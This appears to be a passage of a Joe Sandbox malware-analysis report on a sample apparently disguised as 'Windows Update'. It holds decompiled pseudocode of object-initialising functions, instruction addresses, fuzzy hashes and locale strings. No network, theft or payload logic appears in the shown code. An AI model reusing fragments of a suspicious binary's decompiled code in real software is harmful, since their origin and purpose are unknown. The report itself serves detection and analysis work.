				 *((intOrPtr*)(_t49 + 8)) = 0;
				 *((intOrPtr*)(_t49 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t49 + 0xc)) = 0;
				 *_t49 = 0x413760;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x413758;
				_t13 = _t60 + 0x1f8; // 0x1f8
				_t50 = _t13;
				 *((intOrPtr*)(_t50 + 4)) = 0;
				 *((intOrPtr*)(_t50 + 8)) = 0;
				 *((intOrPtr*)(_t50 + 0xc)) = 0;
				 *((intOrPtr*)(_t50 + 0x10)) = 0;
				 *((intOrPtr*)(_t50 + 0x14)) = 0;
				 *((intOrPtr*)(_t50 + 0x18)) = 0;
				 *((intOrPtr*)(_t50 + 0x1c)) = 0;
				 *_t50 = 0;
				_t21 = _t60 + 0x630; // 0x630
				_t51 = _t21;
				 *((intOrPtr*)(_t51 + 8)) = 0x20;
				 *_t51 = 0;
				 *((intOrPtr*)(_t51 + 0xc)) = 0;
				 *((intOrPtr*)(_t51 + 4)) = 0;
				 *((char*)(__edi + 0x52a)) = 0;
				_t26 = _t60 + 0x64c; // 0x64c
				 *((intOrPtr*)(__edi + 0x640)) = 0x412e80;
				E00F43549(_t26);
				 *((intOrPtr*)(__edi + 0x858)) = 0x413144;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x4130f0;
				_t30 = _t60 + 0x870; // 0x870
				_t53 = _t30;
				 *_t53 = 0x4130f0;
				_t31 = _t60 + 0x878; // 0x878
				_t59 = _t31;
				 *_t59 = 0x413144;
				 *_t53 = 0x412f34;
				_t32 = _t60 + 0x87c; // 0x87c
				_t54 = _t32;
				 *__edi = 0x412e98;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__edi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__edi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__edi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x412f30;
				 *_t59 = 0x412f38;
				_t38 = _t60 + 0x890; // 0x890
				 *_t54 = 0x413bd8;
				 *((intOrPtr*)(_t54 + 8)) = 0;
				 *((intOrPtr*)(_t54 + 0x10)) = 0;
				 *((intOrPtr*)(_t54 + 4)) = 0;
				 *((intOrPtr*)(_t54 + 0xc)) = 0;
				E00F43549(_t38);
				 *((char*)(__edi + 0xb20)) = 0;
				 *((char*)(__edi + 0xc25)) = 0;
				 *((char*)(__edi + 0xd2a)) = 0;
				 *((char*)(__edi + 0xe2f)) = 0;
				 *((char*)(__edi + 0xa9c)) = 0;
				return __edi;
			}










                                                                                  0x00f42e88
                                                                                  0x00f42e8c
                                                                                  0x00f42e93
                                                                                  0x00f42e99
                                                                                  0x00f42e9f
                                                                                  0x00f42ea5
                                                                                  0x00f42eab
                                                                                  0x00f42eab
                                                                                  0x00f42eb6
                                                                                  0x00f42ebc
                                                                                  0x00f42ec2
                                                                                  0x00f42ec5
                                                                                  0x00f42ec8
                                                                                  0x00f42ecb
                                                                                  0x00f42ece
                                                                                  0x00f42ed1
                                                                                  0x00f42ed7
                                                                                  0x00f42ee1
                                                                                  0x00f42ee1
                                                                                  0x00f42ee7
                                                                                  0x00f42eea
                                                                                  0x00f42eed
                                                                                  0x00f42ef0
                                                                                  0x00f42ef3
                                                                                  0x00f42ef6
                                                                                  0x00f42ef9
                                                                                  0x00f42efc
                                                                                  0x00f42efe
                                                                                  0x00f42efe
                                                                                  0x00f42f04
                                                                                  0x00f42f0b
                                                                                  0x00f42f0d
                                                                                  0x00f42f10
                                                                                  0x00f42f13
                                                                                  0x00f42f19
                                                                                  0x00f42f1f
                                                                                  0x00f42f29
                                                                                  0x00f42f2e
                                                                                  0x00f42f38
                                                                                  0x00f42f42
                                                                                  0x00f42f42
                                                                                  0x00f42f48
                                                                                  0x00f42f4e
                                                                                  0x00f42f4e
                                                                                  0x00f42f54
                                                                                  0x00f42f5a
                                                                                  0x00f42f60
                                                                                  0x00f42f60
                                                                                  0x00f42f66
                                                                                  0x00f42f6c
                                                                                  0x00f42f76
                                                                                  0x00f42f80
                                                                                  0x00f42f8a
                                                                                  0x00f42f94
                                                                                  0x00f42f9e
                                                                                  0x00f42fa4
                                                                                  0x00f42faa
                                                                                  0x00f42fb0
                                                                                  0x00f42fb3
                                                                                  0x00f42fb6
                                                                                  0x00f42fb9
                                                                                  0x00f42fbc
                                                                                  0x00f42fc1
                                                                                  0x00f42fc7
                                                                                  0x00f42fcd
                                                                                  0x00f42fd3
                                                                                  0x00f42fda
                                                                                  0x00f42fe3

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $/A$,/A$0/A$X7A$`7A
                                                                                  • API String ID: 0-851144607
                                                                                  • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                  • Instruction ID: b537f7eedf66a03181d9ddf50c3a39e2dfa698e024ec1aadf31c7c219a496030
                                                                                  • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                  • Instruction Fuzzy Hash: 374172B0655642DFC3098F2AC5846C1FFE0BB09314F96C2AFC46C9B211C7B4A5A5CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F43021, Relevance: 6.3, Strings: 5, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00F43021(intOrPtr* __esi) {
				void* __edi;
				intOrPtr* _t20;
				void* _t24;

				_t20 = __esi + 0x878;
				 *__esi = 0x412e98;
				 *((intOrPtr*)(__esi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__esi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__esi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__esi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__esi + 0x86c)) = 0x412f30;
				 *((intOrPtr*)(__esi + 0x870)) = 0x412f34;
				 *_t20 = 0x412f38;
				E00F43663(__esi + 0x890);
				 *((intOrPtr*)(__esi + 0x87c)) = 0x413bd8;
				E00F4D71D(__esi + 0x87c);
				 *_t20 = 0x413144;
				 *((intOrPtr*)(__esi + 0x870)) = 0x4130f0;
				E00F43663(__esi + 0x64c);
				E00F42FE4(__esi + 0x1c8, _t24);
				return E00F4744A(__esi);
			}






                                                                                  0x00f43029
                                                                                  0x00f43035
                                                                                  0x00f4303b
                                                                                  0x00f43041
                                                                                  0x00f4304b
                                                                                  0x00f43055
                                                                                  0x00f4305f
                                                                                  0x00f43069
                                                                                  0x00f43073
                                                                                  0x00f43079
                                                                                  0x00f43084
                                                                                  0x00f4308a
                                                                                  0x00f4308f
                                                                                  0x00f4309b
                                                                                  0x00f430a5
                                                                                  0x00f430aa
                                                                                  0x00f430b8

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $/A$,/A$0/A$4/A$`7A
                                                                                  • API String ID: 0-2435369464
                                                                                  • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                  • Instruction ID: 3979d8145bb145502e1339f60808532e2869f95b793ef3ac01d4bf89521ac6b8
                                                                                  • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                  • Instruction Fuzzy Hash: 20011DB4000B45CAC721EF24C540ACABBF4FB40305F50C90FE4EA4B204DBB8A19ADF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00EF8774, Relevance: 5.2, Strings: 4, Instructions: 214COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • land), xrefs: 00EF8A3E
                                                                                  • 26316EE3FB0D};0804:00000804;0804:{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}{F3BA9077-6C7E-11D4-97FA-0080C882687E};0804:{E429B25A-E5D3-, xrefs: 00EF883E
                                                                                  • def., xrefs: 00EF87D7
                                                                                  • Svizra), xrefs: 00EF87B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 26316EE3FB0D};0804:00000804;0804:{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}{F3BA9077-6C7E-11D4-97FA-0080C882687E};0804:{E429B25A-E5D3-$Svizra)$def.$land)
                                                                                  • API String ID: 0-4033462617
                                                                                  • Opcode ID: 209f6f8739e3a90a3b5928d3f380b2d6c3a88b52f49b74250df187426c8b3a31
                                                                                  • Instruction ID: 782314d702d5237b6228bd3ba65d040cc89f2f6dea380953e838c541c9eabb4f
                                                                                  • Opcode Fuzzy Hash: 209f6f8739e3a90a3b5928d3f380b2d6c3a88b52f49b74250df187426c8b3a31
                                                                                  • Instruction Fuzzy Hash: BD7190B680021DBEDF11AF60EC45EEA3B6CFF08355F0450B6FA08A6061DB759E849F64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%